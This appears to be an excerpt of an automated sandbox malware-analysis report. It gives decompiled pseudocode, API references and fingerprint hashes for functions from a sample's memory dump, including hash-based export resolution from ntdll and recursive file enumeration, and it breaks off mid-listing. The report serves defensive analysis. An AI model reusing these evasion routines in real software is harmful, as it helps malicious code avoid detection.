                                                  • Instruction Fuzzy Hash: 1F81F3B561420196EB64AB10EF5577A3264FB91714F204A3FE359BB3E0EBBC8944870E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004034F0 Relevance: 6.0, APIs: 4, Instructions: 18memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E004034F0(long __ecx) {
				void* _t2;
				long _t6;

				_t6 = __ecx;
				EnterCriticalSection(0x4084d4);
				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, _t6); // executed
				LeaveCriticalSection(0x4084d4);
				return _t2;
			}





                                                  0x004034f7
                                                  0x004034fa
                                                  0x0040350a
                                                  0x00403513
                                                  0x0040351d

                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                  • LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                  • String ID:
                                                  • API String ID: 1367039788-0
                                                  • Opcode ID: 5daea72f964e7636f02427a4c362df6db173182dc9c09987e3f6e00f20fc304f
                                                  • Instruction ID: 01b6da944b15f1f6a327e9d37539a73d2033df78cda66d77d48fdf02a98fd039
                                                  • Opcode Fuzzy Hash: 5daea72f964e7636f02427a4c362df6db173182dc9c09987e3f6e00f20fc304f
                                                  • Instruction Fuzzy Hash: 9BD05E32E0812067C61017B9BE0C99BBA6CEF85662705427AB209E3160CAB85801C7AA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040439A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 686 40439a-4043b6 GetModuleHandleA 687 4043b8-4043c3 LoadLibraryA 686->687 688 4043cc-4043d4 686->688 687->688 689 4043c5-4043c7 687->689 690 4044a3 688->690 691 4043da-4043e5 688->691 692 4044a6-4044ab 689->692 690->692 691->690 693 4043eb-4043f4 691->693 693->690 694 4043fa-4043ff 693->694 694->690 695 404405-404409 694->695 695->690 696 40440f-404434 695->696 697 4044a2 696->697 698 404436-404441 696->698 697->690 699 404443-40444d 698->699 700 404492-4044a0 699->700 701 40444f-404469 call 40360d call 403b10 699->701 700->697 700->698 706 404477-40448f 701->706 707 40446b-404473 701->707 706->700 707->699 708 404475 707->708 708->700
                                                  C-Code - Quality: 100%
                                                  			E0040439A(CHAR* __ecx, intOrPtr __edx) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr* _t55;
				intOrPtr _t59;
				void* _t63;
				struct HINSTANCE__* _t67;
				signed int _t70;
				signed char _t72;
				signed int _t78;
				intOrPtr _t87;
				CHAR* _t89;
				intOrPtr _t90;
				struct HINSTANCE__* _t91;

				_t89 = __ecx;
				_v16 = __edx;
				_v5 = 0;
				_t91 = GetModuleHandleA(__ecx);
				if(_t91 != 0) {
					L3:
					if(_t91->i != 0x5a4d) {
						L17:
						return _v5;
					}
					_t55 =  *((intOrPtr*)(_t91 + 0x3c)) + _t91;
					if( *_t55 != 0x4550 || ( *(_t55 + 0x16) & 0x00002000) == 0) {
						goto L17;
					} else {
						_t90 =  *((intOrPtr*)(_t55 + 0x78));
						if(_t90 == 0 ||  *((intOrPtr*)(_t55 + 0x7c)) == 0) {
							goto L17;
						} else {
							_v32 =  *((intOrPtr*)(_t90 + _t91 + 0x1c)) + _t91;
							_t70 = 0;
							_v28 =  *((intOrPtr*)(_t90 + _t91 + 0x24)) + _t91;
							_t59 =  *((intOrPtr*)(_t90 + _t91 + 0x20)) + _t91;
							_v12 = 0;
							_v36 = _t59;
							if( *((intOrPtr*)(_t90 + _t91 + 0x18)) <= 0) {
								L16:
								goto L17;
							} else {
								goto L9;
							}
							do {
								L9:
								_t87 = _v16;
								_t61 =  *((intOrPtr*)(_t59 + _t70 * 4)) + _t91;
								_v20 =  *((intOrPtr*)(_t59 + _t70 * 4)) + _t91;
								_t72 = 0;
								while(1) {
									_t78 = _t72 & 0x000000ff;
									_v24 = _t78;
									if( *((intOrPtr*)(_t87 + _t78 * 4)) == 0) {
										goto L15;
									}
									_t63 = E00403B10(_v20, E0040360D(_t61));
									_t87 = _v16;
									if(_t63 ==  *((intOrPtr*)(_t87 + _v24 * 4))) {
										_v5 = _v5 + 1;
										 *((intOrPtr*)(_t87 + (_t72 & 0x000000ff) * 4)) =  *((intOrPtr*)(_v32 + ( *(_v28 + _v12 * 2) & 0x0000ffff) * 4)) + _t91;
										goto L15;
									}
									_t61 = _v20;
									_t72 = _t72 + 1;
									if(_t72 < 0xff) {
										continue;
									}
									goto L15;
								}
								L15:
								_t59 = _v36;
								_t70 = _v12 + 1;
								_v12 = _t70;
							} while (_t70 <  *((intOrPtr*)(_t90 + _t91 + 0x18)));
							goto L16;
						}
					}
				}
				_t67 = LoadLibraryA(_t89); // executed
				_t91 = _t67;
				if(_t91 != 0) {
					goto L3;
				}
				return 0;
			}






















                                                  0x004043a2
                                                  0x004043a4
                                                  0x004043a8
                                                  0x004043b2
                                                  0x004043b6
                                                  0x004043cc
                                                  0x004043d4
                                                  0x004044a3
                                                  0x00000000
                                                  0x004044a3
                                                  0x004043dd
                                                  0x004043e5
                                                  0x00000000
                                                  0x004043fa
                                                  0x004043fa
                                                  0x004043ff
                                                  0x00000000
                                                  0x0040440f
                                                  0x00404419
                                                  0x00404423
                                                  0x00404425
                                                  0x00404428
                                                  0x0040442a
                                                  0x0040442d
                                                  0x00404434
                                                  0x004044a2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404436
                                                  0x00404436
                                                  0x00404439
                                                  0x0040443c
                                                  0x0040443e
                                                  0x00404441
                                                  0x00404443
                                                  0x00404443
                                                  0x00404446
                                                  0x0040444d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040445b
                                                  0x00404463
                                                  0x00404469
                                                  0x0040448c
                                                  0x0040448f
                                                  0x00000000
                                                  0x0040448f
                                                  0x0040446b
                                                  0x0040446e
                                                  0x00404473
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404475
                                                  0x00404492
                                                  0x00404495
                                                  0x00404498
                                                  0x00404499
                                                  0x0040449c
                                                  0x00000000
                                                  0x00404436
                                                  0x004043ff
                                                  0x004043e5
                                                  0x004043b9
                                                  0x004043bf
                                                  0x004043c3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,004044D8), ref: 004043AC
                                                  • LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,004044D8), ref: 004043B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: HandleLibraryLoadModule
                                                  • String ID: ntdl
                                                  • API String ID: 4133054770-3973061744
                                                  • Opcode ID: bb975948d5144e8028468e35f4164474a17020fb09ec80fee4ec3faf1ab27720
                                                  • Instruction ID: e779b2b9bf78415574e85168f99cd85def5d5433ec81a0b2a41e32fde102af36
                                                  • Opcode Fuzzy Hash: bb975948d5144e8028468e35f4164474a17020fb09ec80fee4ec3faf1ab27720
                                                  • Instruction Fuzzy Hash: D531D0B5E00215DBCB24CF98C480BBEB7B4FF89314F0442AAD941B7381D778A951CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040402B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040402B(WCHAR* __ecx) {
				signed int _t3;

				_t3 = GetFileAttributesW(__ecx); // executed
				return _t3 & 0xffffff00 | _t3 != 0xffffffff;
			}




                                                  0x0040402c
                                                  0x0040403a

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00F7E960,00401035,00F7E960), ref: 0040402C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: a2429e95e03fbe04962fd54191d71f113076e8e98f946da1f9df0c77c0fda816
                                                  • Instruction ID: 8544705db56f1641149a42f7d76e29180c22dde16af9b5027a828299b5c9a162
                                                  • Opcode Fuzzy Hash: a2429e95e03fbe04962fd54191d71f113076e8e98f946da1f9df0c77c0fda816
                                                  • Instruction Fuzzy Hash: 29A022B80300008BCA2C23300F0A00F32000F0B2F03220B2CA033E80E0EA38C0C00002
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00403EAA Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 111fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E00403EAA(intOrPtr __ecx, void* __edx, void* __eflags, signed short _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v616;
				WCHAR* _t29;
				void* _t34;
				void* _t36;
				void* _t37;
				signed int _t45;
				void* _t50;
				void* _t52;
				signed short _t68;
				WCHAR* _t73;
				void* _t77;
				void* _t78;

				_t52 = __edx;
				_v16 = __ecx;
				_t29 = E0040402B(__edx);
				if(_t29 != 0) {
					_t29 = E004034F0(0x208);
					_t73 = _t29;
					if(_t73 != 0) {
						_t75 = E004034F0(0x208);
						_v12 = _t75;
						_t82 = _t75;
						if(_t75 == 0) {
							L13:
							return E0040351E(_t73);
						}
						E004035E8(_t82, _t73, L"%s\\*", __edx);
						_t78 = _t77 + 0xc;
						_t34 = FindFirstFileW(_t73,  &_v616);
						_v20 = _t34;
						if(_t34 == 0xffffffff) {
							L12:
							E0040351E(_t75);
							goto L13;
						} else {
							goto L4;
						}
						do {
							L4:
							_t36 = E00403623(_t52);
							_t37 = E00403623( &(_v616.cFileName));
							_t84 = _t37 + 3 + _t36 - 0x104;
							if(_t37 + 3 + _t36 >= 0x104) {
								L10:
								_t75 = _v12;
								goto L11;
							}
							_push( &(_v616.cFileName));
							E004035E8(_t84, _t73, L"%s\\%s", _t52);
							_t78 = _t78 + 0x10;
							if(_a12 == 0 || (_v616.dwFileAttributes & 0x00000010) == 0 || E00403713( &(_v616.cFileName), L"..") == 0) {
								L15:
								__eflags = _v616.dwFileAttributes & 0x000000a7;
								if((_v616.dwFileAttributes & 0x000000a7) == 0) {
									goto L10;
								}
								_t68 = _a4;
								_t75 = _v12;
								_t45 = (_t68 & 0x0000ffff) + 1;
								__eflags = _t68;
								_t62 =  !=  ?  &(_t73[_t45]) :  &(_v616.cFileName);
								_push( !=  ?  &(_t73[_t45]) :  &(_v616.cFileName));
								E004035E8(__eflags, _v12, L"%s%s", _a8);
								E00403E66(_v16, _t73, __eflags, _t75);
								_t78 = _t78 + 0x14;
							} else {
								_t50 = E00403713( &(_v616.cFileName), ".");
								_t88 = _t50;
								if(_t50 == 0) {
									goto L15;
								}
								E00403EAA(_v16, _t73, _t88, _a4, _a8, 1);
								_t78 = _t78 + 0xc;
								goto L10;
							}
							L11:
						} while (FindNextFileW(_v20,  &_v616) != 0);
						goto L12;
					}
				}
				return _t29;
			}


















                                                  0x00403eb4
                                                  0x00403eb6
                                                  0x00403ebd
                                                  0x00403ec4
                                                  0x00403ed1
                                                  0x00403ed6
                                                  0x00403eda
                                                  0x00403ee7
                                                  0x00403ee9
                                                  0x00403eec
                                                  0x00403eee
                                                  0x00403fc1
                                                  0x00000000
                                                  0x00403fc3
                                                  0x00403efb
                                                  0x00403f00
                                                  0x00403f0b
                                                  0x00403f11
                                                  0x00403f17
                                                  0x00403fba
                                                  0x00403fbc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403f1d
                                                  0x00403f1d
                                                  0x00403f1f
                                                  0x00403f2c
                                                  0x00403f36
                                                  0x00403f3b
                                                  0x00403f9f
                                                  0x00403f9f
                                                  0x00000000
                                                  0x00403f9f
                                                  0x00403f43
                                                  0x00403f4b
                                                  0x00403f50
                                                  0x00403f57
                                                  0x00403fcf
                                                  0x00403fcf
                                                  0x00403fd6
                                                  0x00000000
                                                  0x00000000
                                                  0x00403fd8
                                                  0x00403fe1
                                                  0x00403fe7
                                                  0x00403fe8
                                                  0x00403fee
                                                  0x00403ff1
                                                  0x00403ffb
                                                  0x00404006
                                                  0x0040400b
                                                  0x00403f76
                                                  0x00403f81
                                                  0x00403f86
                                                  0x00403f88
                                                  0x00000000
                                                  0x00000000
                                                  0x00403f97
                                                  0x00403f9c
                                                  0x00000000
                                                  0x00403f9c
                                                  0x00403fa2
                                                  0x00403fb2
                                                  0x00000000
                                                  0x00403f1d
                                                  0x00403eda
                                                  0x00403fce

                                                  APIs
                                                    • Part of subcall function 0040402B: GetFileAttributesW.KERNELBASE(00F7E960,00401035,00F7E960), ref: 0040402C
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00403F0B
                                                  • FindNextFileW.KERNEL32(0040174B,?), ref: 00403FAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: File$CriticalFindHeapSection$AllocateAttributesEnterFirstLeaveNextProcess
                                                  • String ID: %s%s$%s\%s$%s\*
                                                  • API String ID: 674214967-2064654797
                                                  • Opcode ID: cabad34e7e7135359c44172283c1635a289dbe4081dd430380b879a4a189ccb9
                                                  • Instruction ID: 0d19af2fd814e55343d0ea9ba16141ed1d132e68cf772a52d048647e9719b3e8
                                                  • Opcode Fuzzy Hash: cabad34e7e7135359c44172283c1635a289dbe4081dd430380b879a4a189ccb9
                                                  • Instruction Fuzzy Hash: 92310271E002196BCB20AE218C45AAEBB7D9B80706F0441BAF805B73D1EB3D9F018789
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404068 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E00404068(intOrPtr __ecx, intOrPtr __edx, void* _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAW _v608;
				signed int _t32;
				signed int _t39;
				WCHAR* _t40;
				int _t46;
				intOrPtr _t48;
				WCHAR* _t49;
				WCHAR* _t59;
				signed int* _t68;
				WCHAR* _t69;

				_t68 = _a4;
				_t48 = __ecx;
				_v12 = __edx;
				_v16 = __ecx;
				if( *((intOrPtr*)(__ecx +  *_t68 * 4)) != 0) {
					_t69 = E004034F0(0x208);
					__eflags = _t69;
					if(__eflags == 0) {
						L14:
						return _t69;
					}
					E004035E8(__eflags, _t69, L"%s\\*", _v12);
					_a4 = FindFirstFileW(_t69,  &_v608);
					_t32 = E00403623(_t69);
					__eflags = _a4 - 0xffffffff;
					 *((short*)(_t69 + _t32 * 2 - 4)) = 0;
					if(_a4 == 0xffffffff) {
						goto L14;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						__eflags = E00403B10( &(_v608.cFileName), E00403623( &(_v608.cFileName)) + _t33) -  *((intOrPtr*)(_t48 +  *_t68 * 4));
						if(__eflags == 0) {
							break;
						}
						_t46 = FindNextFileW(_a4,  &_v608);
						__eflags = _t46;
						if(_t46 != 0) {
							continue;
						}
						L11:
						_t39 =  *_t68;
						__eflags =  *(_t48 + _t39 * 4);
						if( *(_t48 + _t39 * 4) == 0) {
							goto L14;
						} else {
							goto L12;
						}
						do {
							L12:
							_t39 = _t39 + 1;
							__eflags =  *(_t48 + _t39 * 4);
						} while ( *(_t48 + _t39 * 4) != 0);
						 *_t68 = _t39;
						goto L14;
					}
					_push( &(_v608.cFileName));
					E004035E8(__eflags, _t69, L"%s\\%s", _t69);
					 *_t68 =  *_t68 + 1;
					_t49 = E00404068(_t48, _t69, _t68);
					__eflags = _t49;
					if(_t49 == 0) {
						L10:
						_t48 = _v16;
						goto L11;
					}
					_t40 = E00403713(_t49, _t69);
					_t59 = _t69;
					__eflags = _t40;
					if(_t40 != 0) {
						E004036C7(_t59, _t49);
						E0040351E(_t49);
						goto L14;
					}
					E004036C7(_t59, _v12);
					E0040351E(_t49);
					goto L10;
				}
				return 0;
			}















                                                  0x00404074
                                                  0x00404077
                                                  0x00404079
                                                  0x0040407c
                                                  0x00404085
                                                  0x00404098
                                                  0x0040409a
                                                  0x0040409c
                                                  0x0040416d
                                                  0x00000000
                                                  0x0040416d
                                                  0x004040ab
                                                  0x004040c3
                                                  0x004040c6
                                                  0x004040cd
                                                  0x004040d1
                                                  0x004040d6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004040dc
                                                  0x004040dc
                                                  0x004040f8
                                                  0x004040fb
                                                  0x00000000
                                                  0x00000000
                                                  0x00404107
                                                  0x0040410d
                                                  0x0040410f
                                                  0x00000000
                                                  0x00000000
                                                  0x0040415c
                                                  0x0040415c
                                                  0x0040415e
                                                  0x00404162
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404164
                                                  0x00404164
                                                  0x00404164
                                                  0x00404165
                                                  0x00404165
                                                  0x0040416b
                                                  0x00000000
                                                  0x0040416b
                                                  0x00404119
                                                  0x00404121
                                                  0x00404126
                                                  0x00404132
                                                  0x00404137
                                                  0x00404139
                                                  0x00404159
                                                  0x00404159
                                                  0x00000000
                                                  0x00404159
                                                  0x0040413f
                                                  0x00404144
                                                  0x00404146
                                                  0x00404148
                                                  0x00404178
                                                  0x0040417f
                                                  0x00000000
                                                  0x0040417f
                                                  0x0040414d
                                                  0x00404154
                                                  0x00000000
                                                  0x00404154
                                                  0x00000000

                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004040BB
                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404107
                                                    • Part of subcall function 0040351E: GetProcessHeap.KERNEL32(00000000,00000000,00403026,?,?,?,?,?,?,?,?,?,?,?,004035DC,?), ref: 00403525
                                                    • Part of subcall function 0040351E: RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,004035DC,?,00000400,?), ref: 0040352C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: FileFindHeap$FirstFreeNextProcess
                                                  • String ID: %s\%s$%s\*
                                                  • API String ID: 1689202581-2848263008
                                                  • Opcode ID: 3cc723fa770a856a9ad4b071feef7facf257f3fef3ef6473236f4ee909822057
                                                  • Instruction ID: 64e856b175231b10b8a7f0f32b78d0fb4118fa1dc8ae40eb50ce56fed654d173
                                                  • Opcode Fuzzy Hash: 3cc723fa770a856a9ad4b071feef7facf257f3fef3ef6473236f4ee909822057
                                                  • Instruction Fuzzy Hash: AC31B670B00214ABCB20AF65CC85A6F7BA8AFD4745F10447BA906B73D1DB3D9E418B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402979 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 245COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E00402979(signed int* __ecx, short* __edx, char* _a4, signed char _a8, intOrPtr _a12) {
				char _v24;
				signed int* _v28;
				short* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short* _v44;
				intOrPtr _v47;
				short* _v48;
				short* _v52;
				intOrPtr _v56;
				signed int _v64;
				signed int _t81;
				int _t82;
				char _t86;
				short* _t88;
				signed int _t89;
				void* _t97;
				signed int _t101;
				signed char _t104;
				signed char _t105;
				short _t113;
				signed int _t114;
				signed int _t118;
				short* _t119;
				int _t120;
				int _t122;
				short* _t123;
				short* _t127;
				char* _t128;
				short* _t131;
				signed int _t133;
				signed int _t135;
				signed char _t136;
				void* _t138;
				char* _t139;
				short* _t140;
				short* _t141;
				signed int* _t145;
				signed char* _t148;
				short _t163;

				_t131 = __edx;
				_t145 = __ecx;
				_v28 = __ecx;
				_t81 =  *__ecx;
				if((_t81 & 0x00000001) != 0) {
					 *__ecx = _t81 & 0xfffffffb;
				}
				_t133 = _a8;
				if(_t145[1] > _t133) {
					_t145[1] = _t133;
				}
				_t118 = _t145[3];
				_t111 = 1;
				if(_t118 == 1) {
					L66:
					_t82 = _t111;
					_t145[2] = _t111;
					L67:
					return _t82;
				}
				if(_t118 == 2) {
					if(_a12 == 0) {
						_t111 = WideCharToMultiByte(0, 0, _t131, 1, 0, 0, 0, 0);
					}
					goto L66;
				}
				if(_t118 == 3) {
					_t119 = 0;
					_v44 = 0;
					if( *_t131 == 0) {
						 *_t131 = "(null)";
					}
					if(_a12 == _t119) {
						while(_t145[2] == 0 || _t119 < _t145[2]) {
							if( *((char*)(_t119 +  *_t131)) == 0) {
								goto L63;
							}
							_t119 = _t119 + 1;
						}
						goto L63;
					} else {
						_t113 =  *_t131;
						while(_t145[2] == 0 || _t119 < _t145[2]) {
							_t86 =  *_t113;
							if(_t86 == 0) {
								break;
							}
							if(IsDBCSLeadByte(_t86) != 0) {
								_t113 = _t113 + 1;
							}
							_t119 = _v47 + 1;
							_v47 = _t119;
							if( *_t113 == 0) {
								break;
							} else {
								_t113 = _t113 + 1;
								continue;
							}
						}
						L63:
						_t120 =  >  ? _t133 : _t119;
						_t145[2] = _t120;
						_t82 = _t120;
						goto L67;
					}
				}
				if(_t118 == 4) {
					_t122 = 0;
					if( *_t131 == 0) {
						 *_t131 = L"(null)";
					}
					_t135 = _t122;
					if(_a12 == _t122) {
						_t88 =  *_t131;
						while(1) {
							_v44 = _t88;
							if(_t145[2] != 0 && _t135 >= _t145[2]) {
								break;
							}
							if( *_t88 == _t122) {
								break;
							}
							_t135 = _t135 + WideCharToMultiByte(_t122, _t122, _t88, _t111, _t122, _t122, _t122, _t122);
							_t88 =  &(_v44[1]);
							_t122 = 0;
						}
						_t89 = _t145[2];
						if(_t89 != 0) {
							_t135 =  >  ? _t89 : _t135;
						}
						goto L46;
					} else {
						while(_t145[2] == _t122 || _t135 < _t145[2]) {
							if( *((intOrPtr*)( *_t131 + _t135 * 2)) == _t122) {
								break;
							}
							_t135 = _t135 + 1;
						}
						L46:
						_t136 =  >  ? _a8 : _t135;
						_t145[2] = _t136;
						L47:
						_t82 = _t136;
						goto L67;
					}
				}
				if(_t118 - 5 > 2) {
					_t82 = 0;
					goto L67;
				} else {
					_t114 =  *_t131;
					_t95 =  ==  ? "0123456789abcdef" : "0123456789ABCDEF";
					_v36 =  ==  ? "0123456789abcdef" : "0123456789ABCDEF";
					_v52 = _t131[2];
					_t97 = 0xa;
					_t138 = 0x10;
					_t98 =  ==  ? _t138 : _t97;
					_t139 = _a4;
					_v40 =  ==  ? _t138 : _t97;
					_v44 = _t139;
					if(_t118 == 5) {
						_t163 = _t131[2];
						if(_t163 <= 0 && (_t163 < 0 || _t114 < 0)) {
							_t128 = _t139;
							 *_t128 = 0x2d;
							_t18 = _t128 + 1; // 0x1
							_t114 =  ~( *_t131);
							_v44 = _t18;
							asm("adc ecx, eax");
							_v52 =  ~(_t131[2]);
						}
					}
					if(( *_t145 & 0x00000080) != 0 || ( *_t145 & 0x00000100) == 0) {
						_v52 = 0;
					}
					_t100 = _v40;
					_t140 =  &_v24;
					_t147 = _v52;
					asm("cdq");
					_t123 = _t131;
					_v32 = _t123;
					do {
						_push(_t114);
						_t101 = E00406A10(_t114, _t147, _t100, _t123);
						_v64 = _t114;
						_t114 = _t101;
						_t147 = _t131;
						_t100 = _v56;
						 *_t140 =  *((intOrPtr*)(_t123 + _v52));
						_t140 = _t140 + 1;
						_t123 = _v48;
					} while ((_t114 | _t131) != 0);
					_t148 = _v28;
					_v32 = _t140;
					_t141 = _v44;
					if(_t140 <=  &_v24) {
						L22:
						_t104 = _a8;
						 *_t141 = 0;
						_t136 =  >  ? _t104 : _t141 - _a4;
						if(_t148[8] < _t136) {
							_t148[8] = _t136;
						}
						if(_t148[8] > _t104) {
							_t148[8] = _t104;
						}
						if(( *_t148 & 0x00000004) != 0) {
							_t105 = _t148[4];
							if(_t105 > _t148[8]) {
								_t148[8] = _t105;
							}
						}
						if(( *_t148 & 0x00000002) != 0) {
							_t136 = _t136 + 2;
						}
						goto L47;
					}
					_t127 = _v32;
					do {
						_t127 = _t127 - 1;
						 *_t141 =  *_t127;
						_t141 =  &(_t141[0]);
					} while (_t127 >  &_v24);
					goto L22;
				}
			}











































                                                  0x00402979
                                                  0x00402984
                                                  0x00402987
                                                  0x0040298b
                                                  0x0040298f
                                                  0x00402994
                                                  0x00402994
                                                  0x00402996
                                                  0x0040299c
                                                  0x0040299e
                                                  0x0040299e
                                                  0x004029a1
                                                  0x004029a6
                                                  0x004029a9
                                                  0x00402be4
                                                  0x00402be4
                                                  0x00402be6
                                                  0x00402be9
                                                  0x00402bef
                                                  0x00402bef
                                                  0x004029b2
                                                  0x00402bd0
                                                  0x00402be2
                                                  0x00402be2
                                                  0x00000000
                                                  0x00402bd0
                                                  0x004029bb
                                                  0x00402b65
                                                  0x00402b67
                                                  0x00402b6d
                                                  0x00402b6f
                                                  0x00402b6f
                                                  0x00402b78
                                                  0x00402baa
                                                  0x00402bbb
                                                  0x00000000
                                                  0x00000000
                                                  0x00402bbd
                                                  0x00402bbd
                                                  0x00000000
                                                  0x00402b7a
                                                  0x00402b7a
                                                  0x00402b7c
                                                  0x00402b87
                                                  0x00402b8b
                                                  0x00000000
                                                  0x00000000
                                                  0x00402b96
                                                  0x00402b98
                                                  0x00402b98
                                                  0x00402b9d
                                                  0x00402ba1
                                                  0x00402ba5
                                                  0x00000000
                                                  0x00402ba7
                                                  0x00402ba7
                                                  0x00000000
                                                  0x00402ba7
                                                  0x00402ba5
                                                  0x00402bc0
                                                  0x00402bc2
                                                  0x00402bc5
                                                  0x00402bc8
                                                  0x00000000
                                                  0x00402bc8
                                                  0x00402b78
                                                  0x004029c4
                                                  0x00402aef
                                                  0x00402af3
                                                  0x00402af5
                                                  0x00402af5
                                                  0x00402afb
                                                  0x00402b00
                                                  0x00402b17
                                                  0x00402b19
                                                  0x00402b1d
                                                  0x00402b21
                                                  0x00000000
                                                  0x00000000
                                                  0x00402b2b
                                                  0x00000000
                                                  0x00000000
                                                  0x00402b3b
                                                  0x00402b41
                                                  0x00402b44
                                                  0x00402b44
                                                  0x00402b48
                                                  0x00402b4d
                                                  0x00402b51
                                                  0x00402b51
                                                  0x00000000
                                                  0x00402b02
                                                  0x00402b02
                                                  0x00402b12
                                                  0x00000000
                                                  0x00000000
                                                  0x00402b14
                                                  0x00402b14
                                                  0x00402b54
                                                  0x00402b57
                                                  0x00402b5b
                                                  0x00402b5e
                                                  0x00402b5e
                                                  0x00000000
                                                  0x00402b5e
                                                  0x00402b00
                                                  0x004029d0
                                                  0x00402ae8
                                                  0x00000000
                                                  0x004029d6
                                                  0x004029de
                                                  0x004029e5
                                                  0x004029eb
                                                  0x004029f4
                                                  0x004029f8
                                                  0x004029fb
                                                  0x004029fc
                                                  0x004029ff
                                                  0x00402a02
                                                  0x00402a08
                                                  0x00402a0f
                                                  0x00402a11
                                                  0x00402a14
                                                  0x00402a1c
                                                  0x00402a1e
                                                  0x00402a21
                                                  0x00402a29
                                                  0x00402a2b
                                                  0x00402a2f
                                                  0x00402a33
                                                  0x00402a33
                                                  0x00402a14
                                                  0x00402a3a
                                                  0x00402a44
                                                  0x00402a44
                                                  0x00402a48
                                                  0x00402a4c
                                                  0x00402a50
                                                  0x00402a54
                                                  0x00402a55
                                                  0x00402a5b
                                                  0x00402a5f
                                                  0x00402a5f
                                                  0x00402a64
                                                  0x00402a69
                                                  0x00402a6e
                                                  0x00402a70
                                                  0x00402a79
                                                  0x00402a7d
                                                  0x00402a81
                                                  0x00402a84
                                                  0x00402a84
